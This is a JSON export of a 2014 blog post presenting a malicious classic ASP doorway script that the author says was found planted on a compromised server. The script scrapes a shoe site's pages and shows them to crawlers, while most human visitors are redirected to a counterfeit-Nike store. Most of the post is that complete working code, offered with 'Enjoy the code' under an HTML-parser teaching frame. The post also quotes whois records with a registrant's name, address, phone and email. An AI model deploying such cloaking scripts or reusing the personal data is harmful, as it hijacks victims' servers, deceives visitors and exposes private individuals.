{"id":131,"date":"2014-08-28T09:51:02","date_gmt":"2014-08-28T09:51:02","guid":{"rendered":"http:\/\/www.danieledavi.com\/blog\/?p=131"},"modified":"2014-08-28T09:52:55","modified_gmt":"2014-08-28T09:52:55","slug":"html-parser-in-classic-asp","status":"publish","type":"post","link":"https:\/\/www.danieledavi.com\/blog\/2014\/08\/html-parser-in-classic-asp\/","title":{"rendered":"HTML Parser in Classic ASP"},"content":{"rendered":"

Today I’ll show you a script written in classic ASP that can use some server vulnerability to provide traffic from an unaware website to another one through another unaware server.<\/p>\n

It’s quite simple, so I’m not going to explain it in details.
\nThis malicious code was founded on a server, and is provided as it is (I didn’t change or hide the malicious recipient) and is provided for solely\u00a0educational purpose<\/span>.<\/p>\n

The educational purpose is related basically to the creation of an HTML Parser or XML Parser in classic ASP \u00a0and\u00a0I’ll also show other\u00a0\u00a0ASP functions examples.<\/p>\n

\"ASP\"<\/a>

Classic ASP<\/p><\/div>\n

This file is called “airmaxonline2014wszat.asp” but on the victim server there where many similars in many folders with different names. Also you can save it with the name you prefer.<\/p>\n

What changes in each file?
\nBasically the only 3 variables that changes are “fromsite<\/strong>“, “tourl<\/strong>” and “pageid<\/strong>“. “Jumptodomain” si always the same since the purpose\u00a0of the operation is to bring traffic always to the same website.<\/p>\n

Note how filename<\/strong> (and obviously tourl<\/strong>) sound like fromsite<\/strong> to have a better impact on referral analysis.
\nA more tricky aspect to avoid to have just a simple blank page that redirect to the target website is to get the HTML of the middle-tier web page so that on the it seems a real exitant full-of-contents page.<\/p>\n

Enjoy the code.<\/p>\n

<%@LANGUAGE=\"VBSCRIPT\" CODEPAGE=\"65001\"%>\r\n<%\r\nOn Error Resume Next\r\ndim jumptodomain, imagefolder, fromsite, tourl\r\njumptodomain = \"www.ebrandshoe.com\"\r\nfromsite = \"http:\/\/www.airmaxonline2014.com\/\" \r\ntourl =\"http:\/\/www.foo.com\/airmaxonline2014wszat.asp\"\r\npageid = \"airmaxonline2014\" \r\nimagefolder = \"images\/\"\r\ntourl = tourl&\"?\"&pageid&\"=\"\r\n\r\n        Function GetLocationURL() \r\n\tDim Url \r\n\tDim ServerPort,ServerName,ScriptName,QueryString \r\n\tServerName = Request.ServerVariables(\"SERVER_NAME\") \r\n\tServerPort = Request.ServerVariables(\"SERVER_PORT\") \r\n\tScriptName = Request.ServerVariables(\"SCRIPT_NAME\") \r\n\tQueryString = Request.ServerVariables(\"QUERY_STRING\") \r\n\tUrl=\"http:\/\/\"&ServerName \r\n\tIf ServerPort <> \"80\" Then Url = Url & \":\" & ServerPort \r\n\tUrl=Url&ScriptName \r\n\tIf QueryString <>\"\" Then Url=Url&\"?\"& QueryString \r\n\tGetLocationURL=Server.URLEncode(Url)\r\nEnd Function\r\nFunction GetCode(str,regstr)\r\n\tDim Reg,serStr,Cols\r\n\tSet Reg= new RegExp\r\n\tReg.IgnoreCase = True\r\n\tReg.MultiLine = True\r\n\tReg.Pattern =regstr\r\n\tIf Reg.test(str) Then\r\n\t   Set Cols = Reg.Execute(str)\r\n\t   GetCode=Cols(0).SubMatches(0)\r\n\tElse \r\n\t   GetCode=\"\"\r\n\tEnd If\r\n\tSet Cols = Nothing\r\n\tSet Reg = Nothing\r\nEnd Function\r\n%>\r\n<%\r\non error resume next\r\nFunction  getHTTPPage(URL)\r\nSet   HTTPReq   =   Server.createobject(\"Msxml2.XMLHTTP\")    \r\nHTTPReq.Open   \"GET\",   URL,   False \r\nHTTPReq.send \r\nIf   HTTPReq.readyState   <>   4   Then   Exit   Function \r\ngetHTTPPage   =   Bytes2bStr(HTTPReq.responseBody) \r\nSet   HTTPReq   =   Nothing \r\nEnd   Function\r\nFunction   Bytes2bStr(vin)\r\nDim   BytesStream,StringReturn\r\nSet   BytesStream   =   Server.CreateObject(\"ADODB.Stream\")\r\nBytesStream.Type   =   2\r\nBytesStream.Open\r\nBytesStream.WriteText   vin\r\nBytesStream.Position   =   0\r\nBytesStream.Charset   =   \"UTF-8\"\r\nBytesStream.Position   =   2\r\nStringReturn   =BytesStream.ReadText\r\nBytesStream.close \r\nSet   BytesStream   =   Nothing \r\nBytes2bStr   =   StringReturn \r\nEnd   Function\r\nif request(pageid)<>\"\" then\r\nhtmls = getHTTPPage(fromsite&request(pageid))\r\nhtmls =  replace(htmls,\"\"&chr(34)&fromsite,\"\"&chr(34)&\"\/\")\r\nhtmls =  replace(htmls,\"\"&chr(34)&\"\/\"&imagefolder,\"\"&chr(34)&fromsite&imagefolder)\r\nhtmls =  replace(htmls,\"\"&chr(34)&imagefolder,\"\"&chr(34)&fromsite&imagefolder)\r\nhtmls =  replace(htmls,\"\"&chr(34)&\"\/includes\/\",\"\"&chr(34)&fromsite&\"includes\/\") \r\nhtmls =  replace(htmls,\"\"&chr(34)&\"includes\/\",\"\"&chr(34)&fromsite&\"includes\/\") \r\nhtmls =  replace(htmls,\"\"&chr(34)&\"\/media\/\",\"\"&chr(34)&fromsite&\"media\/\") \r\nhtmls =  replace(htmls,\"\"&chr(34)&\"media\/\",\"\"&chr(34)&fromsite&\"media\/\")\r\nhtmls =  replace(htmls,\"\"&chr(34)&\"\/skin\/\",\"\"&chr(34)&fromsite&\"skin\/\") \r\nhtmls =  replace(htmls,\"\"&chr(34)&\"js\/\",\"\"&chr(34)&fromsite&\"skin\/\")\r\nhtmls =  replace(htmls,\"\"&chr(34)&\"\/js\/\",\"\"&chr(34)&fromsite&\"js\/\") \r\nhtmls =  replace(htmls,\"\"&chr(34)&\"skin\/\",\"\"&chr(34)&fromsite&\"js\/\") \r\nhtmls =  replace(htmls,\"href=\"&chr(34),\"href=\"&chr(34)&\"\/\") \r\nhtmls =  replace(htmls,\"href=\"&chr(34)&\"\/\/\",\"href=\"&chr(34)&\"\/\") \r\nhtmls =  replace(htmls,\"href=\"&chr(34)&\"\/http\",\"href=\"&chr(34)&\"http\") \r\nhtmls =  replace(htmls,\"href=\"&chr(34)&\"\/\",\"href=\"&chr(34)&tourl) \r\nelse\r\nhtmls = getHTTPPage(fromsite)\r\nhtmls =  replace(htmls,\"\"&chr(34)&fromsite,\"\"&chr(34)&\"\/\")\r\nhtmls =  replace(htmls,\"\"&chr(34)&\"\/\"&imagefolder,\"\"&chr(34)&fromsite&imagefolder)\r\nhtmls =  replace(htmls,\"\"&chr(34)&imagefolder,\"\"&chr(34)&fromsite&imagefolder)\r\nhtmls =  replace(htmls,\"\"&chr(34)&\"\/includes\/\",\"\"&chr(34)&fromsite&\"includes\/\") \r\nhtmls =  replace(htmls,\"\"&chr(34)&\"includes\/\",\"\"&chr(34)&fromsite&\"includes\/\")\r\nhtmls =  replace(htmls,\"\"&chr(34)&\"\/media\/\",\"\"&chr(34)&fromsite&\"media\/\") \r\nhtmls =  replace(htmls,\"\"&chr(34)&\"media\/\",\"\"&chr(34)&fromsite&\"media\/\") \r\nhtmls =  replace(htmls,\"\"&chr(34)&\"\/skin\/\",\"\"&chr(34)&fromsite&\"skin\/\") \r\nhtmls =  replace(htmls,\"\"&chr(34)&\"js\/\",\"\"&chr(34)&fromsite&\"skin\/\")\r\nhtmls =  replace(htmls,\"\"&chr(34)&\"\/js\/\",\"\"&chr(34)&fromsite&\"js\/\") \r\nhtmls =  replace(htmls,\"\"&chr(34)&\"skin\/\",\"\"&chr(34)&fromsite&\"js\/\") \r\nhtmls =  replace(htmls,\"href=\"&chr(34),\"href=\"&chr(34)&\"\/\") \r\nhtmls =  replace(htmls,\"href=\"&chr(34)&\"\/\/\",\"href=\"&chr(34)&\"\/\") \r\nhtmls =  replace(htmls,\"href=\"&chr(34)&\"\/http\",\"href=\"&chr(34)&\"http\") \r\nhtmls =  replace(htmls,\"href=\"&chr(34)&\"\/\",\"href=\"&chr(34)&tourl) \r\nend if\r\n\r\ndim pagetitle\r\npagetitle = GetCode(htmls,\"(.*?)<\\\/title>\")\r\npagetitle = Server.URLEncode(pagetitle)\r\ndim agent,language,referer\r\nagent=request.servervariables(\"http_user_agent\")\r\nlanguage=request.servervariables(\"HTTP_ACCEPT_LANGUAGE\")\r\nreferer=request.servervariables(\"HTTP_REFERER\")\r\nif language = \"\" and referer = \"\" then\r\n\tif InStr(agent, \"bot\")<=0 then \t\tResponse.Redirect \"http:\/\/\"&jumptodomain&\"\/?from=\"&GetLocationURL()&\"&q=\"&pagetitle \t\tResponse.End \tend if else \tResponse.Redirect \"http:\/\/\"&jumptodomain&\"\/?from=\"&GetLocationURL()&\"&q=\"&pagetitle \tResponse.End end if response.write htmls %><\/pre>\n
Of course it is natural to be courious about who tried to claim the benefit of this pages and anyone can performe a whois request on the two domains to know more about them. To make you a favour I’m just copying here what the whois returned to me so that you can save time.
\nThe scammer:<\/p>\n
Registrant Org\tMING AI is associated with ~22 other domains\t  \r\nRegistrar\tGODADDY.COM, LLC\r\nRegistrar Status\tclientDeleteProhibited, clientRenewProhibited, clientTransferProhibited, clientUpdateProhibited\r\nDates\tCreated on 2014-07-22 - Expires on 2015-07-22 - Updated on 2014-08-18\t  \r\nName Server(s)\tF1G1NS1.DNSPOD.NET (has 1,672,713 domains)\r\nF1G1NS2.DNSPOD.NET (has 1,672,713 domains)\r\n  \r\nIP Address\t109.235.50.202 - 12 other sites hosted on this server\t  \r\nIP Location\tNetherlands - Utrecht - Houten - Xeneurope Vps Services\r\nASN\tNetherlands AS47869 NETROUTING-AS Netrouting,NL (registered Sep 09, 2008)\r\nDomain Status\tRegistered And Active Website\r\nWhois History\t11 records have been archived since 2011-05-14\t  \r\nIP History\t5 changes on 5 unique IP addresses over 3 years\t  \r\nRegistrar History\t1 registrar with 1 drop\t  \r\nHosting History\t4 changes on 3 unique name servers over 3 years\t  \r\nWhois Server\twhois.godaddy.com\r\n Website\r\nWebsite Title\t  EBrandShoe - Cheap NIKE - JUST DO IT, Enjoy buying cheap nike air max, nike free,nike air max ireland store are discount price and 100% quality goods!\t  \r\nServer Type\tApache\/2.2.15\r\nResponse Code\t200\r\nSEO Score\t83%\t\r\nTerms\t3073 (Unique: 348, Linked: 2788)\r\nImages\t48 (Alt tags missing: 15)\r\nLinks\t771   (Internal: 771, Outbound: 0)\r\nWhois Record ( last updated on 2014-08-28 )\r\nDomain Name: EBRANDSHOE.COM\r\nRegistrar URL: http:\/\/www.godaddy.com\r\nRegistrant Name: MING AI\r\nRegistrant Organization: \r\nName Server: F1G1NS1.DNSPOD.NET\r\nName Server: F1G1NS2.DNSPOD.NET\r\nDNSSEC: unsigned<\/pre>\n
The (unaware?) supporter:<\/p>\n
airmaxonline2014.com | Domain Informations\r\nUpdated : 2014-06-12\r\nAir Max Online 2014 Airmaxonline2014 airmaxonline2014.com Technicals Datas Page Rank : N\/A IP : 94.242.255.127 IP-based Geolocation of Airmaxonline2014.com :   Luxembourg\r\nIP-based Coordinate : latitude : 49.75 | longitude : 6.17 Status : Online (New)\r\n\r\nDomain Name: AIRMAXONLINE2014.COM\r\nRegistry Domain ID: 1855988301_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.enom.com\r\nRegistrar URL: www.enom.com\r\nUpdated Date: 2014-04-24 03:37:24Z\r\nCreation Date: 2014-04-24 10:37:00Z\r\nRegistrar Registration Expiration Date: 2015-04-24 10:37:00Z\r\nRegistrar: ENOM, INC.\r\nRegistrar IANA ID: 48\r\nRegistrar Abuse Contact Email: abuse@enom.com\r\nRegistrar Abuse Contact Phone: +1.4252744500\r\nDomain Status: clientTransferProhibited\r\nRegistry Registrant ID: \r\nRegistrant Name: TIAN JING\r\nRegistrant Organization: \r\nRegistrant Street: NO.516, XIBALIWA, SHIZHONGQU\r\nRegistrant City: JINAN\r\nRegistrant State\/Province: SHANDONG\r\nRegistrant Postal Code: 250002\r\nRegistrant Country: CN\r\nRegistrant Phone: +86.5132973673\r\nRegistrant Phone Ext: \r\nRegistrant Fax: \r\nRegistrant Fax Ext:\r\nRegistrant Email: NHURIE@SINA.COM\r\nRegistry Admin ID: \r\nAdmin Name: TIAN JING\r\nAdmin Organization: \r\nAdmin Street: NO.516, XIBALIWA, SHIZHONGQU\r\nAdmin City: JINAN\r\nAdmin State\/Province: SHANDONG\r\nAdmin Postal Code: 250002\r\nAdmin Country: CN\r\nAdmin Phone: +86.5132973673\r\nAdmin Phone Ext: \r\nAdmin Fax: \r\nAdmin Fax Ext:\r\nAdmin Email: NHURIE@SINA.COM\r\nRegistry Tech ID: \r\nTech Name: TIAN JING\r\nTech Organization: \r\nTech Street: NO.516, XIBALIWA, SHIZHONGQU\r\nTech City: JINAN\r\nTech State\/Province: SHANDONG\r\nTech Postal Code: 250002\r\nTech Country: CN\r\nTech Phone: +86.5132973673\r\nTech Phone Ext: \r\nTech Fax: \r\nTech Fax Ext: \r\nTech Email: NHURIE@SINA.COM\r\nName Server: DNS1.NAME-SERVICES.COM\r\nName Server: DNS2.NAME-SERVICES.COM\r\nName Server: DNS3.NAME-SERVICES.COM\r\nName Server: DNS4.NAME-SERVICES.COM\r\nName Server: DNS5.NAME-SERVICES.COM\r\nDNSSEC: unSigned\r\nURL of the ICANN WHOIS Data Problem Reporting System: http:\/\/wdprs.internic.net\/\r\nLast update of WHOIS database: 2014-04-24 03:37:24Z\r\n\r\n<\/pre>\n
 <\/p>\n","protected":false},"excerpt":{"rendered":"
Today I’ll show you a script written in classic ASP that can use some server vulnerability to provide traffic from an unaware website to another one through another unaware server. It’s quite simple, so I’m not going to explain it in details. This malicious code was founded on a server, and is provided as it […]<\/p>\n","protected":false},"author":1,"featured_media":132,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[35,3],"tags":[38,36,40,41,37,39],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/www.danieledavi.com\/blog\/wp-content\/uploads\/2014\/08\/AspClassic.png","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p90hsv-27","jetpack-related-posts":[{"id":151,"url":"https:\/\/www.danieledavi.com\/blog\/2015\/04\/write-special-characters-in-cookies-with-classic-asp\/","url_meta":{"origin":131,"position":0},"title":"Write special characters in cookies with classic ASP","author":"Daniele Dav\u00ec","date":"April 21, 2015","format":false,"excerpt":"The following code line Response.Cookies(\"test\")= \"__cf_mob_redir\" will produce a cookie named \"test\" whith value \"%5F%5Fcf%5Fmob%5Fredir\" Perhaps is not what we wanted. Even if we could decode the result when reading the cookie that string is very ugly. Could also happen that our responsibility is limited to write the right value\u2026","rel":"","context":"In "Classic ASP"","block_context":{"text":"Classic ASP","link":"https:\/\/www.danieledavi.com\/blog\/category\/programming\/classic-asp\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2014\/08\/AspClassic.png?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":142,"url":"https:\/\/www.danieledavi.com\/blog\/2014\/09\/how-to-read-a-pop3-server-mail-folder-with-c\/","url_meta":{"origin":131,"position":1},"title":"How to read a Pop3 server mail folder with C#","author":"Daniele Dav\u00ec","date":"September 8, 2014","format":false,"excerpt":"Let's see how to read emails from a pop3 Server. After setting some variables, we'll create a connection to the Pop3 Server and we'll try to autenticate with user and password. After we'll take a bunch of messages and we'll start to iterate some operation per each message. The message\u2026","rel":"","context":"In ".Net C#"","block_context":{"text":".Net C#","link":"https:\/\/www.danieledavi.com\/blog\/category\/programming\/dot-net-c-sharp\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2014\/09\/csharp-image.png?resize=350%2C200","width":350,"height":200},"classes":[]},{"id":138,"url":"https:\/\/www.danieledavi.com\/blog\/2014\/09\/how-to-use-windows-registry-in-your-net-c-application\/","url_meta":{"origin":131,"position":2},"title":"How to use Windows registry in your .Net C# application","author":"Daniele Dav\u00ec","date":"September 5, 2014","format":false,"excerpt":"In this article I will show how to read and use in your .Net C# application informations stored in\u00a0the Windows registry. First of all let's see the easiest way to store some information in the server registry. You can use the \"regedit\" command to edit the register or you can\u2026","rel":"","context":"In ".Net C#"","block_context":{"text":".Net C#","link":"https:\/\/www.danieledavi.com\/blog\/category\/programming\/dot-net-c-sharp\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2014\/09\/csharp-image.png?resize=350%2C200","width":350,"height":200},"classes":[]},{"id":462,"url":"https:\/\/www.danieledavi.com\/blog\/2020\/02\/run-daily-scrum-like-a-pro\/","url_meta":{"origin":131,"position":3},"title":"Run daily Scrum like a pro","author":"Daniele Dav\u00ec","date":"February 13, 2020","format":false,"excerpt":"The daily scrum is the heartbeat of a scrum team.As Scrum is a compression algorithm for organizational and engineering best practices, this meeting is not a Scrum invention but it is considered an Agile best practice independently from the adopted framework. It is also known as StandUpMeeting (1993 Jim Coplien),\u2026","rel":"","context":"In "Agile"","block_context":{"text":"Agile","link":"https:\/\/www.danieledavi.com\/blog\/category\/agile-2\/"},"img":{"alt_text":"daily plank","src":"https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2021\/03\/daily_plank.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2021\/03\/daily_plank.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2021\/03\/daily_plank.png?resize=525%2C300&ssl=1 1.5x"},"classes":[]},{"id":719,"url":"https:\/\/www.danieledavi.com\/blog\/2021\/02\/happiness-as-an-organisational-performance-metric\/","url_meta":{"origin":131,"position":4},"title":"Happiness as an organisational performance metric","author":"Daniele Dav\u00ec","date":"February 23, 2021","format":false,"excerpt":"Are \u201chappy\u201d workforces more productive?You would be surprised to know that the problem on how to quantify happiness is well known and solved from decades.\u00a0You can measure your \"employee turnover\" or attrition rate and infer happiness.\u00a0You can use a more direct approach, similarly to the way you quantify your customer's\u2026","rel":"","context":"In "Agile"","block_context":{"text":"Agile","link":"https:\/\/www.danieledavi.com\/blog\/category\/agile-2\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":885,"url":"https:\/\/www.danieledavi.com\/blog\/2021\/11\/successful-meetings-in-high-performing-organisations-part-2-during-the-meeting\/","url_meta":{"origin":131,"position":5},"title":"Successful Meetings in High Performing Organisations \u2013 Part 2: During the meeting","author":"Daniele Dav\u00ec","date":"November 6, 2021","format":false,"excerpt":"In the first part of this series titled \"Successful Meetings in High Performing Organisations \u2013 Part 1: Before the meeting\", I have covered how to prepare for successful meeting. In this article, I will talk about how to ensure the success of a meeting. Photo by Jason Goodman on Unsplash\u2026","rel":"","context":"In "Business"","block_context":{"text":"Business","link":"https:\/\/www.danieledavi.com\/blog\/category\/business\/"},"img":{"alt_text":"Office Meeting","src":"https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2021\/11\/jason-goodman-Oalh2MojUuk-unsplash.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2021\/11\/jason-goodman-Oalh2MojUuk-unsplash.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2021\/11\/jason-goodman-Oalh2MojUuk-unsplash.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2021\/11\/jason-goodman-Oalh2MojUuk-unsplash.jpg?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2021\/11\/jason-goodman-Oalh2MojUuk-unsplash.jpg?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/www.danieledavi.com\/blog\/wp-content\/uploads\/2021\/11\/jason-goodman-Oalh2MojUuk-unsplash.jpg?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"amp_validity":null,"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/www.danieledavi.com\/blog\/wp-json\/wp\/v2\/posts\/131"}],"collection":[{"href":"https:\/\/www.danieledavi.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.danieledavi.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.danieledavi.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.danieledavi.com\/blog\/wp-json\/wp\/v2\/comments?post=131"}],"version-history":[{"count":3,"href":"https:\/\/www.danieledavi.com\/blog\/wp-json\/wp\/v2\/posts\/131\/revisions"}],"predecessor-version":[{"id":135,"href":"https:\/\/www.danieledavi.com\/blog\/wp-json\/wp\/v2\/posts\/131\/revisions\/135"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.danieledavi.com\/blog\/wp-json\/wp\/v2\/media\/132"}],"wp:attachment":[{"href":"https:\/\/www.danieledavi.com\/blog\/wp-json\/wp\/v2\/media?parent=131"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.danieledavi.com\/blog\/wp-json\/wp\/v2\/categories?post=131"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.danieledavi.com\/blog\/wp-json\/wp\/v2\/tags?post=131"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}